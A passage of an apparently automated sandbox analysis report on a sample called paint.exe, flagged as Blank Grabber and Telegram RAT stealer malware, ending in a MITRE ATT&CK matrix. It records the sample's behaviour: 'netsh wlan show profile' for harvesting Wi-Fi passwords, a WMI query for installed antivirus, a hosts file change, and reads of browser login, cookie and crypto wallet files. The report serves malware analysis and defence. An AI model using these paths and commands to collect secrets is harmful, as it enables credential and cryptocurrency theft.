Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\paint.exe

Code function: 0_2_00007FF6F0BDD080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF6F0BDD080

Source: C:\Users\user\Desktop\paint.exe

Code function: 0_2_00007FF6F0BF5C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF6F0BF5C70

Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe

Code function: 88_2_00007FF623E148CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

88_2_00007FF623E148CC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Desktop\paint.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.1673300933.0000023393145000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2003846185.000002077225D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1673300933.0000023393147000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: paint.exe PID: 6716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: paint.exe PID: 2132, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI67162\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: paint.exe PID: 2132, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fJaxx
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match

File source: Process Memory Space: paint.exe PID: 2132, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.1673300933.0000023393145000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2003846185.000002077225D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1673300933.0000023393147000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: paint.exe PID: 6716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: paint.exe PID: 2132, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI67162\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: paint.exe PID: 2132, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	2 Registry Run Keys / Startup Folder	1 Access Token Manipulation	4 Disable or Modify Tools	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	222 Command and Scripting Interpreter	Logon Script (Windows)	11 Process Injection	11 Deobfuscate/Decode Files or Information	Security Account Manager	49 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	2 Registry Run Keys / Startup Folder	21 Obfuscated Files or Information	NTDS	151 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	11 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
